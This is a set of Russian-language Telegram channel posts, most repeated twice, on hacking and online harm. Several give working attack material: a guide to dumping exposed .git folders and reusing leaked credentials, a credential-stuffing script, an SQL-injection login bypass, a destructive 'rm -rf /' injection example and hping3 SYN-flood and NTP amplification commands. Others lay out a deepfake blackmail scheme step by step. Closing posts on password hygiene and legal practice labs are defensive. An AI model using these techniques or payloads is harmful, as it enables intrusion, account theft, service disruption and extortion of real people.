Всех приветствую! сегодня мы разберем: как через .git вытащить то, что забыли спрятать
Все говорят про безопасность, но половина проектов лежит с открытым .git на продакшене. Сегодня покажу, как превратить эту ошибку в свой козырь.
Вывод:
.git на продакшене — это не ошибка, это подарок. Всегда проверяйте. Всегда используйте.
Следующий раз — разберём, фишки Windows
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Все говорят про безопасность, но половина проектов лежит с открытым .git на продакшене. Сегодня покажу, как превратить эту ошибку в свой козырь.
Используем простой поиск в Google или нетривиальный waybackurls + gau:
waybackurls target.com | grep -E "\.git/" | uniq
Цель — найти https://target.com/.git/.
Шаг 2: Забор
Если доступ есть, качаем всё. Берем git-dumper:
python3 git_dumper.py https://target.com/.git/ ./output-dir
Инструмент вытянет всю историю, даже если доступ частичный.
Шаг 3: Анализ и извлечение
Переходим в папку и смотрим логи:
git log --oneline
Ищем коммиты с говорящими названиями вроде "hotfix pass", "remove credentials", "add config".
Затем просматриваем изменения в конкретном коммите:
git show <commit-hash>
Часто в старых коммитах лежат пароли от БД, API-ключи cloud-сервисов или даже приватные SSH-ключи, которые "удалили", но они навсегда в истории.
Шаг 4: Что делать с этим?
· Ключи от облака (AWS, DigitalOcean): Проверяем на доступность. Часто ключи живут долго.
· Пароли БД: Пробуем подключиться не только к основной БД проекта, но и к внутренним сервисам компании.
· Исходники: Ищем уязвимости в самом коде, которые не попали в продакшен. Логики бэкдоров, скрытые эндпоинты.
Реальный кейс:
Однажды в истории нашли старый файл конфига с паролем от внутренней VPN. Этот пароль оказался тем же, что и для корпоративной почты админа. Дальше — дело техники.
Инструменты:
· git-dumper
· truffleHog (для автоматического поиска секретов в гите)
· Gitleaks
Вывод:
.git на продакшене — это не ошибка, это подарок. Всегда проверяйте. Всегда используйте.
Следующий раз — разберём, фишки Windows
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
❤3
Фишки Windows для исследований и оптимизации
Эти инструменты — не просто удобства. Это рычаги для тех, кто работает без ограничений. Я вам покажу такое что мало где рассказывают
Читать статью - клик
в следующий раз мы разберем как делаются боты и их основу
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Эти инструменты — не просто удобства. Это рычаги для тех, кто работает без ограничений. Я вам покажу такое что мало где рассказывают
Читать статью - клик
в следующий раз мы разберем как делаются боты и их основу
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
❤1
Гайд по созданию ботов: инструменты и автоматизация
Хочешь автоматизировать рутину или создать сеть для задач? Боты — твой инструмент. Вот суть.
ВЫБОР ЯЗЫКА И БИБЛИОТЕК
Python — лучший старт. Библиотеки:
· requests/aiohttp — отправка HTTP-запросов (основа любого бота).
· BeautifulSoup4/lxml — парсинг HTML (вытащить данные из страницы).
· selenium/playwright — управление реальным браузером (если сайт на сложном JavaScript).
· pyautogui — автоматизация действий мыши/клавиатуры (для десктопных программ).
· telebot/aiogram — создание Telegram-ботов.
· socket — для низкоуровневых сетевых ботов (например, для подключения к игровым серверам).
ЧТО МОЖНО АВТОМАТИЗИРОВАТЬ?
1. Парсинг данных (цены, новости, контакты)
2. Автопостинг в соцсети/мессенджеры:
· Через API (Telegram Bot API, VK API) или эмуляцию действий через selenium.
3. Мониторинг изменений (наличие товара, изменение цены):
· Бот периодически проверяет страницу и при изменении отправляет уведомление.
4. Автозаполнение форм, отправка сообщений.
5. Торговые/игровые боты (взаимодействие через API или эмуляцию кликов).
КАК ОБХОДИТЬ ЗАЩИТУ?
Сайты блокируют ботов. Вот как быть на шаг впереди:
1. Прокси и VPN: Меняй IP-адреса. Используй ротацию прокси.
2. Реальные заголовки (headers): Включай User-Agent, Accept-Language, другие заголовки как у браузера.
3. Задержки: time.sleep(random.uniform(2, 5)) между действиями.
4. Куки и сессии: Сохраняй сессию через requests.Session().
5. Капча: Сервисы anti-captcha (платно) или обучение своей модели (сложно).
ПРИМЕР: БОТ-МОНИТОР ДЛЯ САЙТА
· Асинхронность: asyncio + aiohttp для одновременной работы сотен ботов.
· Распределение: Запуск ботов на разных серверах/VPS.
· Скрытность: Эмуляция человеческого поведения (случайные скроллы, движения мыши через selenium).
· Панель управления: Веб-интерфейс для управления ботами (Flask/Django).
Итог: Основа бота — эмуляция человеческих действий с защитой от обнаружения. Начни с простого парсера, добавь прокси и случайные задержки, затем масштабируй. Так же хочу дать важный совет начинающим, не бойтесь гуглить если что-то не понимаете в этом нет ничего постыдного.
в следующий раз разберем как Vзл@мыв@ют аккаунты, сайты и базы данных приложений
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Хочешь автоматизировать рутину или создать сеть для задач? Боты — твой инструмент. Вот суть.
ВЫБОР ЯЗЫКА И БИБЛИОТЕК
Python — лучший старт. Библиотеки:
· requests/aiohttp — отправка HTTP-запросов (основа любого бота).
· BeautifulSoup4/lxml — парсинг HTML (вытащить данные из страницы).
· selenium/playwright — управление реальным браузером (если сайт на сложном JavaScript).
· pyautogui — автоматизация действий мыши/клавиатуры (для десктопных программ).
· telebot/aiogram — создание Telegram-ботов.
· socket — для низкоуровневых сетевых ботов (например, для подключения к игровым серверам).
ЧТО МОЖНО АВТОМАТИЗИРОВАТЬ?
1. Парсинг данных (цены, новости, контакты)
# Пример: парсим заголовки с сайта
import requests
from bs4 import BeautifulSoup
response = requests.get('https://example.com')
soup = BeautifulSoup(response.text, 'html.parser')
titles = soup.find_all('h2') # Ищем все заголовки
for title in titles:
print(title.text)
2. Автопостинг в соцсети/мессенджеры:
· Через API (Telegram Bot API, VK API) или эмуляцию действий через selenium.
3. Мониторинг изменений (наличие товара, изменение цены):
· Бот периодически проверяет страницу и при изменении отправляет уведомление.
4. Автозаполнение форм, отправка сообщений.
5. Торговые/игровые боты (взаимодействие через API или эмуляцию кликов).
КАК ОБХОДИТЬ ЗАЩИТУ?
Сайты блокируют ботов. Вот как быть на шаг впереди:
1. Прокси и VPN: Меняй IP-адреса. Используй ротацию прокси.
2. Реальные заголовки (headers): Включай User-Agent, Accept-Language, другие заголовки как у браузера.
3. Задержки: time.sleep(random.uniform(2, 5)) между действиями.
4. Куки и сессии: Сохраняй сессию через requests.Session().
5. Капча: Сервисы anti-captcha (платно) или обучение своей модели (сложно).
ПРИМЕР: БОТ-МОНИТОР ДЛЯ САЙТА
import requests
import time
import hashlib
last_content_hash = None # Хеш предыдущего содержимого
while True:
response = requests.get('https://target-site.com/stock')
current_hash = hashlib.md5(response.content).hexdigest() # Считаем хеш страницы
if last_content_hash and current_hash != last_content_hash:
print("[!] Страница изменилась! Отправляем сигнал.")
# Тут можно отправить сообщение в Telegram или email
# Например, через telebot или smtplib
last_content_hash = current_hash
time.sleep(60) # Проверяем каждую минуту
СЛЕДУЮЩИЙ УРОВЕНЬ· Асинхронность: asyncio + aiohttp для одновременной работы сотен ботов.
· Распределение: Запуск ботов на разных серверах/VPS.
· Скрытность: Эмуляция человеческого поведения (случайные скроллы, движения мыши через selenium).
· Панель управления: Веб-интерфейс для управления ботами (Flask/Django).
Итог: Основа бота — эмуляция человеческих действий с защитой от обнаружения. Начни с простого парсера, добавь прокси и случайные задержки, затем масштабируй. Так же хочу дать важный совет начинающим, не бойтесь гуглить если что-то не понимаете в этом нет ничего постыдного.
в следующий раз разберем как Vзл@мыв@ют аккаунты, сайты и базы данных приложений
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
❤1
Как на самом деле взламывают аккаунты, сайты и базы данных?
Забудь про хакеров в капюшонах из фильмов. Всё проще, грязнее и часто банальнее. Вот реальные методы, которые работают прямо сейчас.
1. Взлом аккаунтов: не пароль, а человеческий фактор
· Фишинг (90% успеха): Не нужно ломать. Нужно попросить. Тебе приходит письмо «Ваш аккаунт заблокирован» или сообщение от «друга» с ссылкой на «новый стикерпак». Ссылка ведёт на точную копию страницы входа в ВК, Steam, банк. Ты вводишь логин и пароль — они уже у злоумышленника. Всё. Пароль может быть хоть 50 символов.
· SIM-своппинг: Звонок в салон мобильного оператора от имени «владельца», социальная инженерия, получение дубликата сим-карты. Все смс-коды двухфакторной аутентификации теперь приходят нашедшему. Банковские приложения падают за час.
· Перебор по утечкам (Credential Stuffing): Берут логин и пароль из старой утечки (допустим, от какого-нибудь старого форума). Пробуют эту же связку на Gmail, Steam, Amazon. Люди используют одни и те же пароли везде — это золотая жила.
Практический пример (ТОЛЬКО ДЛЯ ПОНИМАНИЯ):
Скрипт на Python для Credential Stuffing может выглядеть так (упрощённо):
Работает, если на сайте нет капчи или лимита попыток.
2. Взлом сайтов: эксплуатация дыр, а не магия
· SQL-инъекция (SQLi): Классика, которая до сих пор убивает. Если форма ввода на сайте (поиск, логин) плохо написана, в неё можно ввести не данные, а кусок команды для базы данных.
· Ввод в поле логина: ' OR '1'='1' --
· Что делает: Команда OR '1'='1' всегда истинна, -- комментирует остаток запроса. Можно обойти авторизацию или вытащить всю базу данных: имена, email, хеши паролей.
· Инъекция на стороне сервера (RCE): Если очень повезёт, через уязвимые параметры можно передать команду напрямую серверу. Например, ; rm -rf / или загрузить веб-шелл (файл, дающий полный контроль через браузер).
3. Взлом баз данных приложений: кража «сливков»
Чаще всего БД не «взламывают» отдельно. К ним получают доступ через:
1. Уязвимость в самом приложении (как SQLi выше).
2. Конфигурационные ошибки: База данных (например, MongoDB, Redis) вынесена в интернет без пароля. Её находят сканеры портов за пару часов и забирают всё.
3. Взлом сервера: Через уязвимость в панели управления, старом ПО на сервере или того же сотрудника (фишинг). Получив права администратора на машине, доступ к БД — дело техники.
Итог: Основные враги безопасности — лень (не обновлять софт), глупость (кликать на ссылки) и повторение паролей. Защита строится не на секретности, а на правильных привычках и грамотной настройке систем. Но большинство предпочитает рисковать, пока их данные не окажутся в открытом доступе на каком-нибудь даркнет-форуме.
в следующий раз разберем как ломают интернет в данное время (дд0с)
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Забудь про хакеров в капюшонах из фильмов. Всё проще, грязнее и часто банальнее. Вот реальные методы, которые работают прямо сейчас.
1. Взлом аккаунтов: не пароль, а человеческий фактор
· Фишинг (90% успеха): Не нужно ломать. Нужно попросить. Тебе приходит письмо «Ваш аккаунт заблокирован» или сообщение от «друга» с ссылкой на «новый стикерпак». Ссылка ведёт на точную копию страницы входа в ВК, Steam, банк. Ты вводишь логин и пароль — они уже у злоумышленника. Всё. Пароль может быть хоть 50 символов.
· SIM-своппинг: Звонок в салон мобильного оператора от имени «владельца», социальная инженерия, получение дубликата сим-карты. Все смс-коды двухфакторной аутентификации теперь приходят нашедшему. Банковские приложения падают за час.
· Перебор по утечкам (Credential Stuffing): Берут логин и пароль из старой утечки (допустим, от какого-нибудь старого форума). Пробуют эту же связку на Gmail, Steam, Amazon. Люди используют одни и те же пароли везде — это золотая жила.
Практический пример (ТОЛЬКО ДЛЯ ПОНИМАНИЯ):
Скрипт на Python для Credential Stuffing может выглядеть так (упрощённо):
import requests
# Допустим, у нас есть список login:password из утечки
for creds in stolen_credentials_list:
login, password = creds.split(':')
# Пытаемся автоматически авторизоваться на целевом сайте
session = requests.Session()
response = session.post('https://target-site.com/login', data={'login': login, 'password': password})
if 'Добро пожаловать' in response.text:
print(f'НАЙДЕНО! {login}:{password}')
break
Работает, если на сайте нет капчи или лимита попыток.
2. Взлом сайтов: эксплуатация дыр, а не магия
· SQL-инъекция (SQLi): Классика, которая до сих пор убивает. Если форма ввода на сайте (поиск, логин) плохо написана, в неё можно ввести не данные, а кусок команды для базы данных.
· Ввод в поле логина: ' OR '1'='1' --
· Что делает: Команда OR '1'='1' всегда истинна, -- комментирует остаток запроса. Можно обойти авторизацию или вытащить всю базу данных: имена, email, хеши паролей.
· Инъекция на стороне сервера (RCE): Если очень повезёт, через уязвимые параметры можно передать команду напрямую серверу. Например, ; rm -rf / или загрузить веб-шелл (файл, дающий полный контроль через браузер).
3. Взлом баз данных приложений: кража «сливков»
Чаще всего БД не «взламывают» отдельно. К ним получают доступ через:
1. Уязвимость в самом приложении (как SQLi выше).
2. Конфигурационные ошибки: База данных (например, MongoDB, Redis) вынесена в интернет без пароля. Её находят сканеры портов за пару часов и забирают всё.
3. Взлом сервера: Через уязвимость в панели управления, старом ПО на сервере или того же сотрудника (фишинг). Получив права администратора на машине, доступ к БД — дело техники.
Итог: Основные враги безопасности — лень (не обновлять софт), глупость (кликать на ссылки) и повторение паролей. Защита строится не на секретности, а на правильных привычках и грамотной настройке систем. Но большинство предпочитает рисковать, пока их данные не окажутся в открытом доступе на каком-нибудь даркнет-форуме.
в следующий раз разберем как ломают интернет в данное время (дд0с)
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
❤1
dd0s: как ломают интернет сейчас?
Забудь про старые атаки с ПК. Сейчас это индустрия.
1. МОЩЬ: ОТКУДА БЕРЕТСЯ ТРАФИК?
· Армии вещей: Умные камеры, роутеры, телевизоры. Миллионы уязвимых устройств, из которых строят ботнеты (тип Mirai).
· Усиление (Amplification): Главный хак. Атакующий шлет маленький запрос на открытый сервер (DNS, NTP, Memcached), подделав IP жертвы. Сервер в ответ шлет жертве гигантский поток данных. Усиление в сотни раз.
· Слои:
· L3/L4 (канал): Забивают канал мусором (UDP/ICMP-флуд).
· L7 (приложение): Точечно бьют по сайту. Боты ведут себя как люди, но в тысячи раз быстрее. Ломают логику, а не канал.
2. КТЕХНИКАМ (ТОЛЬКО ДЛЯ ЛАБЫ):
· Проверка уязвимости NTP: ntpdc -c monlist [IP_NTP_СЕРВЕРА] (если ответит списком — бинго).
· Синтетика в лаборатории: hping3 -S --flood --rand-source -p 80 [ЦЕЛЬ] (SYN-флуд).
3. ЗАЩИТА (ОБРАТНАЯ СТОРОНА):
· Фильтрация на границе (BGP Flowspec, ACL).
· Любой ценой закрыть на своих серверах UDP-сервисы, не нужные миру (Memcached, NTP monlist, SSDP).
· CDN/прокси (Cloudflare и аналоги): Спрятать реальный IP, фильтровать ботов.
· Rate-limiting и поведенческий анализ для Layer 7.
СУТЬ: Современный dd0s — это арендуемая мощь уязвимой инфраструктуры всего интернета. Защита — это постоянная гонка и глубокая настройка.
В следующий раз разберем как нейросети создают неотличимую ложь и как этим уже сегодня шантажируют людей
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Забудь про старые атаки с ПК. Сейчас это индустрия.
1. МОЩЬ: ОТКУДА БЕРЕТСЯ ТРАФИК?
· Армии вещей: Умные камеры, роутеры, телевизоры. Миллионы уязвимых устройств, из которых строят ботнеты (тип Mirai).
· Усиление (Amplification): Главный хак. Атакующий шлет маленький запрос на открытый сервер (DNS, NTP, Memcached), подделав IP жертвы. Сервер в ответ шлет жертве гигантский поток данных. Усиление в сотни раз.
· Слои:
· L3/L4 (канал): Забивают канал мусором (UDP/ICMP-флуд).
· L7 (приложение): Точечно бьют по сайту. Боты ведут себя как люди, но в тысячи раз быстрее. Ломают логику, а не канал.
2. КТЕХНИКАМ (ТОЛЬКО ДЛЯ ЛАБЫ):
· Проверка уязвимости NTP: ntpdc -c monlist [IP_NTP_СЕРВЕРА] (если ответит списком — бинго).
· Синтетика в лаборатории: hping3 -S --flood --rand-source -p 80 [ЦЕЛЬ] (SYN-флуд).
3. ЗАЩИТА (ОБРАТНАЯ СТОРОНА):
· Фильтрация на границе (BGP Flowspec, ACL).
· Любой ценой закрыть на своих серверах UDP-сервисы, не нужные миру (Memcached, NTP monlist, SSDP).
· CDN/прокси (Cloudflare и аналоги): Спрятать реальный IP, фильтровать ботов.
· Rate-limiting и поведенческий анализ для Layer 7.
СУТЬ: Современный dd0s — это арендуемая мощь уязвимой инфраструктуры всего интернета. Защита — это постоянная гонка и глубокая настройка.
В следующий раз разберем как нейросети создают неотличимую ложь и как этим уже сегодня шантажируют людей
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Глубокие фейки: как нейросети создают неотличимую ложь и как этим уже сегодня шантажируют людей
Забудь про плохие мемы с лицами знаменитостей. Современные deepfake — это оружие. Они могут заставить любого сказать что угодно, сделать что угодно на видео. И для этого не нужна лаборатория ЦРУ. Нужен мощный ноутбук, гигабайты исходников из Instagram и немного терпения.
Часть 1: Как это работает (без скучной теории)
В основе — нейросети-«соперники» (GAN). Одна — генератор — создаёт подделку. Вторая — дискриминатор — пытается её уличить. Они дерутся миллионы циклов, пока генератор не начнёт побеждать. Результат — видео, где ты говоришь то, чего никогда не говорил.
Практический фрагмент (технологический стек):
Для работы тебе понадобится:
1. Исходники: 5-10 минут качественного видео цели (хорошее освещение, разные ракурсы). Берутся из Stories, прямых эфиров, публичных выступлений.
2. Софт: DeepFaceLab (наиболее мощный) или ROOP (для быстрых однокадровых замен). Софт открытый, лежит на GitHub.
3. Железо: Видеокарта NVIDIA (от 8 ГБ памяти), лучше RTX 3090/4090. На CPU рендерить можно, но это дни, а не часы.
Упрощённая последовательность команд в DeepFaceLab:
Всё. Никакого сложного кода писать не нужно. Интерфейс — набор bat-файлов. Главное — правильно собрать датасет и долго тренировать.
Часть 2: От развлечения к шантажу. Реальные схемы
Здесь начинается тёмная сторона. Алгоритм действий для злоумышленника:
1. Выбор цели: Не звезда, а обычный человек с положением: бухгалтер фирмы, чиновник среднего звена, менеджер с доступом к финансам.
2. Сбор материала: Видеозвонки с коллегами, корпоративные ролики, даже Zoom-конференции, где
цель попала в кадр.
3. Создание компромата: Генерация видео, где «цель» в кадре признаётся в растрате, обсуждает взятку, или ведёт себя непристойно. Звук генерируется отдельно (технологии вроде VALL-E или ElevenLabs).
4. Атака: Видео отправляется жертве с требованием выкупа в биткоинах. Угроза — отправить ролик руководству, семье, в СМИ. Часто выкладывают короткий тизер как доказательство.
5. Давление: Большинство жертв платят. Они не могут доказать, что это фейк, а на экспертизу нет времени или денег. Паника делает своё дело.
Часть 3: Как обнаружить подделку (если очень внимательно)
Идеальных фейков нет. Ищи артефакты:
· Глаза: Неестественное моргание или отсутствие отблесков (light reflections) в радужке.
· Волосы и контуры: Размытые края прически, «плывущий» контур лица на фоне сложного фона.
· Микродвижения: Несинхронность движений головы и мимики.
· Зубы: Слишком идеальные, или неестественная текстура при улыбке.
· Метаданные видео: Даты создания, редактирования, инструменты — всё можно проверить.
Но помни: качество растёт экспоненциально. Через год этих артефактов может не остаться.
вывод:
Технология перестала быть игрушкой. Она стала товаром на тёмных форумах. Услуга «подставлю лицо на любое видео» стоит от 50$. Это оружие массового поражения репутации. Защиты нет — только тотальный контроль над своим цифровым следом. Но если ты уже попал в объектив, то единственный способ бороться с шантажом — не платить. Потому что после первой выплаты последует вторая. И третья. А фейк навсегда останется в сети.
скоро разберем следующую очень интересную тему, которую многие так боятся
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Забудь про плохие мемы с лицами знаменитостей. Современные deepfake — это оружие. Они могут заставить любого сказать что угодно, сделать что угодно на видео. И для этого не нужна лаборатория ЦРУ. Нужен мощный ноутбук, гигабайты исходников из Instagram и немного терпения.
Часть 1: Как это работает (без скучной теории)
В основе — нейросети-«соперники» (GAN). Одна — генератор — создаёт подделку. Вторая — дискриминатор — пытается её уличить. Они дерутся миллионы циклов, пока генератор не начнёт побеждать. Результат — видео, где ты говоришь то, чего никогда не говорил.
Практический фрагмент (технологический стек):
Для работы тебе понадобится:
1. Исходники: 5-10 минут качественного видео цели (хорошее освещение, разные ракурсы). Берутся из Stories, прямых эфиров, публичных выступлений.
2. Софт: DeepFaceLab (наиболее мощный) или ROOP (для быстрых однокадровых замен). Софт открытый, лежит на GitHub.
3. Железо: Видеокарта NVIDIA (от 8 ГБ памяти), лучше RTX 3090/4090. На CPU рендерить можно, но это дни, а не часы.
Упрощённая последовательность команд в DeepFaceLab:
# 1. Извлечь кадры из видео цели и донора (того, чьё лицо подставляем)
python faceset extract
# 2. Обучить модель на датасете (самый долгий этап, может идти сутки)
python train — это командная строка
# 3. Наложить обученное лицо на исходное видео
python merge
# 4. Собрать финальное видео со звуком
python videoed
Всё. Никакого сложного кода писать не нужно. Интерфейс — набор bat-файлов. Главное — правильно собрать датасет и долго тренировать.
Часть 2: От развлечения к шантажу. Реальные схемы
Здесь начинается тёмная сторона. Алгоритм действий для злоумышленника:
1. Выбор цели: Не звезда, а обычный человек с положением: бухгалтер фирмы, чиновник среднего звена, менеджер с доступом к финансам.
2. Сбор материала: Видеозвонки с коллегами, корпоративные ролики, даже Zoom-конференции, где
цель попала в кадр.
3. Создание компромата: Генерация видео, где «цель» в кадре признаётся в растрате, обсуждает взятку, или ведёт себя непристойно. Звук генерируется отдельно (технологии вроде VALL-E или ElevenLabs).
4. Атака: Видео отправляется жертве с требованием выкупа в биткоинах. Угроза — отправить ролик руководству, семье, в СМИ. Часто выкладывают короткий тизер как доказательство.
5. Давление: Большинство жертв платят. Они не могут доказать, что это фейк, а на экспертизу нет времени или денег. Паника делает своё дело.
Часть 3: Как обнаружить подделку (если очень внимательно)
Идеальных фейков нет. Ищи артефакты:
· Глаза: Неестественное моргание или отсутствие отблесков (light reflections) в радужке.
· Волосы и контуры: Размытые края прически, «плывущий» контур лица на фоне сложного фона.
· Микродвижения: Несинхронность движений головы и мимики.
· Зубы: Слишком идеальные, или неестественная текстура при улыбке.
· Метаданные видео: Даты создания, редактирования, инструменты — всё можно проверить.
Но помни: качество растёт экспоненциально. Через год этих артефактов может не остаться.
вывод:
Технология перестала быть игрушкой. Она стала товаром на тёмных форумах. Услуга «подставлю лицо на любое видео» стоит от 50$. Это оружие массового поражения репутации. Защиты нет — только тотальный контроль над своим цифровым следом. Но если ты уже попал в объектив, то единственный способ бороться с шантажом — не платить. Потому что после первой выплаты последует вторая. И третья. А фейк навсегда останется в сети.
скоро разберем следующую очень интересную тему, которую многие так боятся
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Тебе написала школота с угрозами д0кс@? Это твой козырь.
Тебе кинули в личку твой адрес или данные паспорта. Паника? Зря. Ты только что выиграл. Потому что теперь у тебя есть все карты, чтобы уничтожить того, кто это сделал.
Главная ошибка доксера — он выходит на контакт. Он угрожает. Он требует. И с этого момента он перестаёт быть анонимным призраком. Он становится мишенью. Если он просит откуп (кинуть ему бабла) то смело вживайся в роль и проси реквизиты для перевода, это можео сильно сыграть на руку
Скрины угроз — твоё абсолютное оружие. Не удаляй, не блокируй. Сохраняй ВСЁ: его аккаунт, аватар, каждое сообщение, каждый файл. Это не доказательства против тебя. Это доказательства ПРОТИВ НЕГО.
Твой ответ должен быть одним:
«Все угрозы и твои контакты зафиксированы. Следующее сообщение — автоматическая рассылка в Управление «К» МВД (киберпреступления), твоим родителям (я их уже нашёл) и на работу. Выбирай: исчезаешь сейчас или проверяем, кто реально пострадает».
Почему это работает на 100%?
1. Он не хакер. Он нашёл твои старые данные в шерл0ке. Он — обычный школьник или обиженка. Его сила только в твоём страхе.
2. Угрозы по УК РФ — это статьи 119, 137, 163. Твои скрины — прямое доказательство для возбуждения дела. Полиция найдёт его по IP и привязанному к Telegram паспорту.
3. Ему есть что терять. У него есть реальная жизнь: родители, работа, репутация. А у тебя есть скрины, которые могут его уничтожить.
Д0кс — это не атака на тебя. Это предложение сыграть в игру, где правила написал ты. Он показал свою слабость, выйдя из тени. А ты получил рычаг давления на всю его жизнь.
Вывод: не бойся. Записывай. Грози ответкой. И наблюдай, как он сам всё удалит и извинится. Страх — его оружие. А твоё оружие — готовность ударить в десять раз сильнее по его реальному существованию. У теперь есть доказательства. Используй их.
Так же не забываем про кибербезопастность (о ней напишу в следующем посте)
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Тебе кинули в личку твой адрес или данные паспорта. Паника? Зря. Ты только что выиграл. Потому что теперь у тебя есть все карты, чтобы уничтожить того, кто это сделал.
Главная ошибка доксера — он выходит на контакт. Он угрожает. Он требует. И с этого момента он перестаёт быть анонимным призраком. Он становится мишенью. Если он просит откуп (кинуть ему бабла) то смело вживайся в роль и проси реквизиты для перевода, это можео сильно сыграть на руку
Скрины угроз — твоё абсолютное оружие. Не удаляй, не блокируй. Сохраняй ВСЁ: его аккаунт, аватар, каждое сообщение, каждый файл. Это не доказательства против тебя. Это доказательства ПРОТИВ НЕГО.
Твой ответ должен быть одним:
«Все угрозы и твои контакты зафиксированы. Следующее сообщение — автоматическая рассылка в Управление «К» МВД (киберпреступления), твоим родителям (я их уже нашёл) и на работу. Выбирай: исчезаешь сейчас или проверяем, кто реально пострадает».
Почему это работает на 100%?
1. Он не хакер. Он нашёл твои старые данные в шерл0ке. Он — обычный школьник или обиженка. Его сила только в твоём страхе.
2. Угрозы по УК РФ — это статьи 119, 137, 163. Твои скрины — прямое доказательство для возбуждения дела. Полиция найдёт его по IP и привязанному к Telegram паспорту.
3. Ему есть что терять. У него есть реальная жизнь: родители, работа, репутация. А у тебя есть скрины, которые могут его уничтожить.
Д0кс — это не атака на тебя. Это предложение сыграть в игру, где правила написал ты. Он показал свою слабость, выйдя из тени. А ты получил рычаг давления на всю его жизнь.
Вывод: не бойся. Записывай. Грози ответкой. И наблюдай, как он сам всё удалит и извинится. Страх — его оружие. А твоё оружие — готовность ударить в десять раз сильнее по его реальному существованию. У теперь есть доказательства. Используй их.
Так же не забываем про кибербезопастность (о ней напишу в следующем посте)
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Кибербезопасность, которая работает. Не теория, а железные правила!
Забудь про сложные термины. Безопасность в сети сводится к простым действиям, которые делают тебя «несъедобным» для 99% атак.
1. Пароли — твоя главная дыра.
· Правило: Один пароль — один сервис.
· Как: Используй менеджер паролей (KeePass, Bitwarden). Он сгенерирует и запомнит за тебя сложные комбинации. Главный мастер-пароль должен быть уникальным и длинным (фраза). Больше ничего запоминать не нужно.
2. Двухфакторная аутентификация (2FA) — твой щит.
· Что: Вход требует не только пароль, но и одноразовый код.
· Как: ВКЛЮЧИ везде, где есть. Используй не смс, а приложение-аутентификатор (Google Authenticator, Aegis). Это убивает SIM-своппинг.
3. Обновления — не просто так.
· Почему: 80% атак используют известные дыры, для которых патч вышел год назад. Обновляй ОС, браузер и всё важное ПО. Включи автообновления.
4. Фишинг — ловят всех. Будь параноиком.
· Правило: Не кликай на ссылки в письмах и сообщениях.
· Как: Всегда заходи на сайты вручную через браузер. Проверяй адресную строку: g00gle.com — это не Google. Внимание на орфографию.
5. Резервные копии — последняя линия обороны.
· Что: Если всё сломается или тебя зашифруют, только бэкап спасёт.
· Как: Правило 3-2-1. 3 копии данных, на 2 разных носителях, 1 из которых в другом месте (облако, другой город).
6. Цифровая гигиена — меньше следов.
· Что: Не выкладывай в открытый доступ то, что может скомпрометировать: фото документов, дома с геометками, рабочие переписки.
· Как: Проверь, что видят о тебе незнакомцы в соцсетях. Закрой профиль, убери лишнюю информацию.
Итог:
Не нужно быть экспертом. Нужно быть дисциплинированным. Включи 2FA, поставь менеджер паролей, обновляй софт и не верь слепо ссылкам. Эти четыре действия поставят тебя выше большинства пользователей. Безопасность — это не паника, это привычка. Выработай её.
следующий пост будет о том что скрывают обучения за 100$+.
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Забудь про сложные термины. Безопасность в сети сводится к простым действиям, которые делают тебя «несъедобным» для 99% атак.
1. Пароли — твоя главная дыра.
· Правило: Один пароль — один сервис.
· Как: Используй менеджер паролей (KeePass, Bitwarden). Он сгенерирует и запомнит за тебя сложные комбинации. Главный мастер-пароль должен быть уникальным и длинным (фраза). Больше ничего запоминать не нужно.
2. Двухфакторная аутентификация (2FA) — твой щит.
· Что: Вход требует не только пароль, но и одноразовый код.
· Как: ВКЛЮЧИ везде, где есть. Используй не смс, а приложение-аутентификатор (Google Authenticator, Aegis). Это убивает SIM-своппинг.
3. Обновления — не просто так.
· Почему: 80% атак используют известные дыры, для которых патч вышел год назад. Обновляй ОС, браузер и всё важное ПО. Включи автообновления.
4. Фишинг — ловят всех. Будь параноиком.
· Правило: Не кликай на ссылки в письмах и сообщениях.
· Как: Всегда заходи на сайты вручную через браузер. Проверяй адресную строку: g00gle.com — это не Google. Внимание на орфографию.
5. Резервные копии — последняя линия обороны.
· Что: Если всё сломается или тебя зашифруют, только бэкап спасёт.
· Как: Правило 3-2-1. 3 копии данных, на 2 разных носителях, 1 из которых в другом месте (облако, другой город).
6. Цифровая гигиена — меньше следов.
· Что: Не выкладывай в открытый доступ то, что может скомпрометировать: фото документов, дома с геометками, рабочие переписки.
· Как: Проверь, что видят о тебе незнакомцы в соцсетях. Закрой профиль, убери лишнюю информацию.
Итог:
Не нужно быть экспертом. Нужно быть дисциплинированным. Включи 2FA, поставь менеджер паролей, обновляй софт и не верь слепо ссылкам. Эти четыре действия поставят тебя выше большинства пользователей. Безопасность — это не паника, это привычка. Выработай её.
следующий пост будет о том что скрывают обучения за 100$+.
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Обучение взлому: что скрывают курсы за 100 тысяч рублей
Если ты ждешь инструкцию «как взломать ВК за 5 минут», закрой статью. Реальный взлом — это не кнопка. Это скучное, долгое ремесло. Вот из чего на самом деле состоит «обучение».
Фундамент: то, без чего ты ноль
1. Сети: Как движутся пакеты. TCP/IP, DNS, HTTP/S, прокси. Без этого ты слепой.
2. Операционные системы (Linux): Командная строка — твой главный инструмент. Умение жить в терминале Kali или Parrot OS.
3. Языки: Не нужно знать десять. Нужно понимать:
· Python/Bash — для автоматизации скучной работы (перебор, сканирование).
· SQL — чтобы понимать, как ломаются базы данных.
· Основы HTML/JS — чтобы видеть дыры в вебе.
Полигон: где режут кошек
Тебе нужна легальная среда, где можно бить, не попадая под статью.
· Хакатоны и CTF (Capture The Flag): Игровые площадки с задачами на поиск уязвимостей. Примеры: HackTheBox, TryHackMe, OverTheWire.
· Лаборатории: Виртуальные машины с преднамеренно уязвимым софтом (Metasploitable, DVWA).
